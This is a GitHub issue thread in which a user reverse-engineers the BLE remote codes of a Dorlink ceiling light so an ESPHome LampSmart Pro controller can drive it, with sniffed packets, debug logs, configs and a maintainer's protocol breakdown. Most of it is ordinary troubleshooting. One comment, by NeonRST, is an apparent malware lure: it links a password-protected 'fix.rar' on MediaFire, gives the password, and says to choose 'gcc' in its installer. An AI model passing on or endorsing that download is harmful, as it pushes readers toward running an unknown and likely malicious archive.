### ISSUE TITLE
"Dorlink" Light using LampSmart Pro not able to pair.

### ISSUE THREAD

**Issue by JamesSwift** [aronsky/esphome-components#21]
Hello. I love this project, what a fantasic peace of work! 

Sadly, my [specific Dorlink branded light](https://www.amazon.co.uk/dp/B0BQVL25MM) doesn't seem to be supported. If possible it would be great to add this to the list of supported models. I'm happy to provide as much details as possible to try to assist. I've been able to sniff the codes sent by the remote using the method you document. I've included them below (these are all for single presses, not held down).

| Comand | Code |
| --------- | ------- |
| Turn on | `02.01.1A.0B.FF.F0.FF.00.55.8F.24.04.08.65.79` |
|Turn off|`02.01.1A.0B.FF.F0.FF.00.55.8F.24.04.06.67.79`|
|Lower colour temp| `02.01.1A.0B.FF.F0.FF.00.55.8F.24.04.0B.69.80`|
|Raise colour temp|`02.01.1A.0B.FF.F0.FF.00.55.8F.24.04.0A.6A.80`|
|Increase brightness|`02.01.1A.0B.FF.F0.FF.00.55.8F.24.04.02.6B.79`|
|Lower brightness|`02.01.1A.0B.FF.F0.FF.00.55.8F.24.04.03.6C.7B`|
|Night light|`02.01.1A.0B.FF.F0.FF.00.55.8F.24.04.10.6D.89`|
|Cycle through colour temp|`02.01.1A.0B.FF.F0.FF.00.55.8F.24.04.07.6F.82`|
|Side light|`02.01.1A.0B.FF.F0.FF.00.55.8F.24.04.13.73.92`|
|Timer|`02.01.1A.0B.FF.F0.FF.00.55.8F.24.04.12.74.92`|

Long presses causes the remote to transmit the code for a single press, followed by a different code, when it is released it sends a third code. I'll list the hold and release for relevant buttons here:

| Comand | Hold | Release |
| --------- | ------- | ------- | 
|Lower colour temp | `02.01.1A.0B.FF.F0.FF.01.55.8F.24.04.4B.B5.0D`|`02.01.1A.0B.FF.F0.FF.09.55.8F.24.04.8B.C5.65`|
|Raise colour temp | `02.01.1A.0B.FF.F0.FF.02.55.8F.24.04.4A.C9.21` | `02.01.1A.0B.FF.F0.FF.0B.55.8F.24.04.8A.D2.73`|
|Increase brightness | `02.01.1A.0B.FF.F0.FF.02.55.8F.24.04.42.D7.27`| `02.01.1A.0B.FF.F0.FF.09.55.8F.24.04.82.DE.75`|
|Lower brightness| `02.01.1A.0B.FF.F0.FF.04.55.8F.24.04.43.EA.3D`| `02.01.1A.0B.FF.F0.FF.0B.55.8F.24.04.83.F1.8B`|

The Lampsmart pro app pairs with it successfully, but I'm not sure which message is being received and which is dropped. I also seem to have difficulty capturing them all. Here's an example of the turn off command:
```
[23:59:54][D][ble_adv_handler:297]: raw - 02.01.01.1B.03.77.F8.B6.5F.2B.5E.00.FC.31.51.50.FD.52.08.24.CB.C3.FC.3D.10.F4.E6.45.26.7B.74 (31)
[23:59:54][I][lampsmart_pro - v1:233]: Decoded OK - tx: 31, cmd: '0x11', Args: [0,0,0,0]
[23:59:54][I][ble_adv_handler:243]: config: 
ble_adv_controller:
  - id: my_controller_id
    encoding: lampsmart_pro
    variant: v1
    forced_id: 0xFF53E2
    index: 3
[23:59:54][D][lampsmart_pro - v1:103]: UUID: '0xFF53E2', index: 3, tx: 31, cmd: '0x11', args: [0,0,0,0]
[23:59:54][D][ble_adv_handler:254]: enc - 02.01.19.1B.03.77.F8.B6.5F.2B.5E.00.FC.31.51.50.FD.52.08.24.CB.C3.FC.3D.10.F4.E6.45.26.7B.74 (31)
[23:59:54][I][ble_adv_handler:256]: Decoded / Re-encoded with NO DIFF
[23:59:54][W][component:237]: Component esp32_ble_tracker took a long time for an operation (69 ms).
[23:59:54][W][component:238]: Components should block for at most 30 ms.
[23:59:55][D][ble_adv_handler:297]: raw - 02.01.02.03.03.27.18.15.16.27.18.A8.01.51.E7.19.62.00.35.B6.26.EC.3D.50.03.07.00.00.00 (29)
[23:59:57][D][ble_adv_handler:297]: raw - 02.01.01.1B.03.F0.08.30.80.B8.5A.E1.27.06.F1.32.67.66.7D.A4.9F.67.F6.B6.68.E1.8B.53.2B.C9.56 (31)
[23:59:57][I][lampsmart_pro - v3:233]: Decoded OK - tx: 46, cmd: '0x11', Args: [0,0,0,0]
[23:59:57][I][ble_adv_handler:243]: config: 
ble_adv_controller:
  - id: my_controller_id
    encoding: lampsmart_pro
    variant: v3
    forced_id: 0x12F25FE2
    index: 3
[23:59:57][D][lampsmart_pro - v3:103]: UUID: '0x12F25FE2', index: 3, tx: 46, cmd: '0x11', args: [0,0,0,0]
[23:59:57][D][ble_adv_handler:254]: enc - 02.01.19.1B.03.F0.08.30.80.B8.5A.E1.27.06.F1.32.67.66.7D.A4.9F.67.F6.B6.68.E1.8B.53.2B.C9.56 (31)
[23:59:57][I][ble_adv_handler:256]: Decoded / Re-encoded with NO DIFF
[23:59:57][W][component:237]: Component esp32_ble_tracker took a long time for an operation (60 ms).
[23:59:57][W][component:238]: Components should block for at most 30 ms.
[23:59:58][D][ble_adv_handler:297]: raw - 02.01.01.05.03.AA.BB.12.34 (9)

```
Let me know if there's more information I can provide.

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by NicoIIT** [comment]
Hello @JamesSwift 

You are near the solution I think, as you managed to capture the configs of the paired Lamp Smart Pro app:

```yaml
ble_adv_controller:
  - id: my_controller_id_v1
    encoding: lampsmart_pro
    variant: v1
    forced_id: 0xFF53E2
    index: 3

ble_adv_controller:
  - id: my_controller_id_v3
    encoding: lampsmart_pro
    variant: v3
    forced_id: 0x12F25FE2
    index: 3
```

This log means that the given configs will send EXACTLY the same message than LampSmart Pro app, without the need to pair the ESP32:
`[23:59:54][I][ble_adv_handler:256]: Decoded / Re-encoded with NO DIFF`

So knowing those configs, the last step is to know which one is effectively listened by your light. Just try them one after the other 😄.

Concerning the messages sent by the Remote, I never saw this kind of encoding. Not sure it would be useful, but we could try to implement it and then we would need to guess a bit the content, it seems to be:
```
02.01.1A.0B.FF.F0.FF.09.55.8F.24.04.8B.C5.65
  -> 02.01.1A: standard BLE AD_Flag (len 2, type 01, value 1A)
  -> 0B.FF.F0.FF.09.55.8F.24.04.8B.C5.65:
      -> 0B: length 11
      -> FF.F0: header, always the same
      -> 09 (or 00 in case of short press), an increasing number which could be the number of seconds (or any time unit) the button is pressed
      -> 55.8F.24.04: the id of the remote
      -> 8B for long press / 4B for release / 0B for short press, knowing 'B' differs depending on the command (B/A/2/3), or fixed code for other commands, and you listed all of them 👍 
      -> C5.65: probably a crc16 code for consistency check, to be guessed how it is computed.
```

**Comment by JamesSwift** [comment]
Hi. Thanks so much for your reply, it was very helpful. Sorry for my delay in replying, my family have all been ill which has put this project to the back burner for a while.

After pairing and capturing the packets again, I was able to use the V1 config generated by the debug output to control the light. For a while at least. It was a bit hit or miss whether the commands would be processed or not. After a while it wouldn't work at all.

I suspected it might be interference problems, even though the esp is only about 2m away. I flashed a new esp and positioned it somewhere else. I had a bit more success with this

I've noticed that the index parameter doesn't seem to be transmitted as configured. I have two lights about 2.5m apart. Both have their own index, but when I check the logs when the esp transmits it always sends index 0, regardless of what I have specified. 

In the end, now that the new esp has better signal strength, I was able to delete the `forced_id` and use the pairing process one at a time with the lights to allow me to control them independently. 

The angle and position of the esp seems to be very important for both lights to receive reliably. It's barely good enough when I hold it between the two lights. Is there anything I can do to boost the transmit power? The remote and my phone have had zero instances of not being received by the lights.

**Comment by NicoIIT** [comment]
For the reliability problem, you can try to increase the `seq_duration` and `duration` option at ble_adv_controller level, it will allow the command to be transmitted for a longer time, see [duration doc](https://github.com/aronsky/esphome-components/blob/main/components/ble_adv_controller/CUSTOM.md#durations). Still It may not be enough to solve transmission issues 😞 .

For the forced_id, if it worked once, it means the config is OK !

For the fact the index is kind of 'lost', it is because of FanLamp v1 protocol: the index is 'included' in the forced_id.

In FanLamp protocol, the initial 'forced_id' is an identifier unique to your phone, so for you it is '0x12F25FE2'.
* For v3, the following is sent to in 2 different fields in the message in order to identify the device in a unique way:
  * forced_id as such
  * index
* For v1 some processing is done in order to send this in a unique field: 
  1. this id is truncated to only 2 bytes => 0x5FE2
  2. the index (3) is 'inserted' as 0x0F00 => 0x53E2
  3. A supplementary unique id for your phone (0xFF) is added: => 0xFF53E2, in fact this 0xFF is used in another field of the message but also part of the identification...

Hope it clarifies, but not sure 😄

**Comment by JamesSwift** [comment]
Thanks for the explanation. I've tried messing around with longer durations, but no joy. 

After messing around for a while I've noticed the angle of the esp board makes a huge difference in successful reception by the lights. Some angles neither light receives. Some angles just one, another angle and both receive. Can I ask what esp32 board you use? I'm wondering if these no-name ones I have just have bad bluetooth antennas.

Anyway, you can consider this a non-bug, it appears to function fine when the board is held correctly. Sorry for the false bug report.
